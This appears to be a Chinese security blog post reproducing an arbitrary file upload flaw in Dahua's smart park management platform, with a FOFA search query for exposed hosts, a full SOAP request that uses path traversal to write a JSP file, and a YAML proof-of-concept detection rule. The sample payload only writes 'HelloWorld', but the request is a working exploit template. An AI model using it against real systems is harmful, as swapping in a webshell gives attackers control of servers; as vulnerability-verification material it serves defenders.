Advertisement

大华智慧园区综合管理平台bitmap任意文件上传

阅读量:

简介

大华智慧园区解决方案通过AI技术的集成推动园区安防与办公应用实现智慧化升级,在显著提升企业安全水平的同时显著提升运营效能;将物联网技术深入拓展至企业各类业务领域,在园区内实现人、车、物数据全方位融合与实时计算。搭建覆盖园区全业务范围的大数据平台,在数据向上汇聚为企业提供全方位的数据支撑,在数据向下整合为企业业务提供决策支持能力;全方位实现企业在数字化转型过程中的安全等级提升、运营效率优化以及管理成本降低目标的达成。

漏洞简介

大华智慧园区综合管理平台 /emap/webservice/gis/soap/bitmap接口处存在任何文件上传漏洞,非授权攻击者可携带后门程序的文件进行植入,并运行预设命令序列以规避安全防护措施.

影响范围

大华智慧园区综合管理平台
Fofa:

复制代码 
    app="dahua-智慧园区综合管理平台"

漏洞复现

标签处为base64编码的payload

复制代码 
 POST /emap/webservice/gis/soap/bitmap HTTP/1.1

    
 Host:
    
 Content-Type: text/xml; charset=utf-8
    
 User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
    
 Content-Length: 449
    
  
    
 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:res="http://response.webservice.bitmap.mapbiz.emap.dahuatech.com/">
    
     <soapenv:Header/>
    
     <soapenv:Body>
    
     <res:uploadPicFile>
    
         <arg0>
    
             <picPath>/../HelloWorld.jsp</picPath>
    
         </arg0>
    
         <arg1>
    
  SGVsbG9Xb3JsZA==
    
         </arg1>
    
     </res:uploadPicFile>
    
     </soapenv:Body>
    
 </soapenv:Envelope>

访问/upload/HelloWorld.jsp

poc

复制代码 
 params: []

    
 name: 大华智慧园区综合管理平台 bitmap 任意文件上传漏洞
    
 set: {}
    
 rules:
    
 - method: POST
    
   path: /emap/webservice/gis/soap/bitmap
    
   headers:
    
     Content-Type: text/xml; charset=utf-8
    
   body: |-
    
     <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:res="http://response.webservice.bitmap.mapbiz.emap.dahuatech.com/">
    
     <soapenv:Header/>
    
     <soapenv:Body>
    
         <res:uploadPicFile>
    
             <arg0>
    
                 <picPath>/../HelloWorld.jsp</picPath>
    
             </arg0>
    
             <arg1>
    
      SGVsbG9Xb3JsZA==
    
             </arg1>
    
         </res:uploadPicFile>
    
     </soapenv:Body>
    
     </soapenv:Envelope>
    
   search: ""
    
   followredirects: false
    
   expression: response.status == 200
    
 - method: GET
    
   path: /upload/HelloWorld.jsp
    
   headers: {}
    
   body: ""
    
   search: ""
    
   followredirects: false
    
   expression: response.status == 200 && response.body.bcontains(b"HelloWorld")
    
 groups: {}
    
 detail:
    
   author: ""
    
   links: []
    
   description: ""
    
   version: ""

全部评论 (0)

还没有任何评论哟~

相关文章推荐

大华智慧园区综合管理平台bitmap任意文件上传

简介 大华智慧园区解决方案通过AI技术的加载实现园区安防与园区办公应用的智慧化升级,提升企业安全等级和办公效率;将物联网应用神经延伸至企业各种业务场景,实现人、车、物数据信息线上融合与计算,为园区智慧...

大华智慧园区综合管理平台 bitmap 任意文件上传漏洞复现

0x01产品简介 “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

大华智慧园区综合管理平台任意文件上传漏洞

一、漏洞简介 华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。

大华智慧园区综合管理平台publishing任意文件上传漏洞

一、漏洞简介 大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。

大华智慧园区综合管理平台poi任意文件上传漏洞

一、漏洞简介 大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。

大华智慧园区综合管理平台 video 任意文件上传漏洞

目录 漏洞描述 FOFA语法/鹰图语句 漏洞复现 漏洞描述 大华智慧园区综合管理平台video接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 FOFA语法/鹰图语句...

大华智慧园区综合管理平台存在任意文件上传漏洞

大华智慧园区综合管理平台存在任意文件上传漏洞 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一...

【1day】复现大华智慧园区综合管理平台任意文件上传漏洞

注:该文章来自作者日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与作者无关。 目录 一、漏洞描述 二、影响版本 三、资产测绘 四、漏洞复现 一、漏洞描述 大华智慧园区综合...

【漏洞复现】大华-智慧园区综合管理平台-devicePoint_addImgIco-任意文件上传

目录 免责声明 0x01产品简介 0x02漏洞概述 0x03网络测绘 0x04漏洞复现 0x05Nuclei 免责声明 此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何...

大华智慧园区综合管理平台 poi 任意文件上传漏洞复现

0x01产品简介 “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。